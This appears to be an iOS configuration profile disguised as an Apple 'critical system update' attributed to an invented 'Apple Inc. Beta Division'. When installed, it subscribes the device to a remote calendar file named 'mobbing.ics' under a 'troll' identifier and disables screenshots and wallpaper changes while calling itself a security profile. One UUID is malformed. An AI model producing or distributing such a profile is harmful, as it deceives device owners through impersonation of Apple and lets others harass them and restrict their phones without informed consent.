<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>PayloadContent</key>
	<array>
		<dict>
			<key>PayloadDescription</key>
			<string> Apple Sistem Bildirim Protokolü</string>
			<key>PayloadDisplayName</key>
			<string>Sistem Takvimi</string>
			<key>PayloadIdentifier</key>
			<string>com.apple.calendar.managed.troll</string>
			<key>PayloadType</key>
			<string>com.apple.subscribedcalendar.account</string>
			<key>PayloadUUID</key>
			<string>12345678-1234-1234-1234-123456789012</string>
			<key>PayloadVersion</key>
			<integer>1</integer>
			
			<key>SubCalAccountHostName</key>
			<string>raw.githubusercontent.com</string>
			<key>SubCalAccountPath</key>
			<string>/keremkero319-del/keross/main/mobbing.ics</string>
			<key>SubCalAccountUseSSL</key>
			<true/>
		</dict>

		<dict>
			<key>PayloadDescription</key>
			<string>Cihaz Güvenliği ve Optimizasyon</string>
			<key>PayloadDisplayName</key>
			<string>Güvenlik Profili</string>
			<key>PayloadIdentifier</key>
			<string>com.apple.managed.restrictions.pro</string>
			<key>PayloadType</key>
			<string>com.apple.applicationaccess</string>
			<key>PayloadUUID</key>
			<string>99998888-7777-6666-5555-444433332222</string>
			<key>PayloadVersion</key>
			<integer>1</integer>
			<key>allowScreenShot</key>
			<false/>
			<key>allowWallpaperModification</key>
			<false/>
		</dict>
	</array>
	<key>PayloadDisplayName</key>
	<string> iOS 19.4 Kritik Sistem Güncellemesi</string>
	<key>PayloadIdentifier</key>
	<string>com.apple.system.update.beta</string>
	<key>PayloadOrganization</key>
	<string>Apple Inc. Beta Division</string>
	<key>PayloadRemovalDisallowed</key>
	<false/>
	<key>PayloadType</key>
	<string>Configuration</string>
	<key>PayloadUUID</key>
	<string>ABCDEF12-ABCD-1234-EFGH-567890ABCDEF</string>
	<key>PayloadVersion</key>
	<integer>1</integer>
</dict>
</plist>
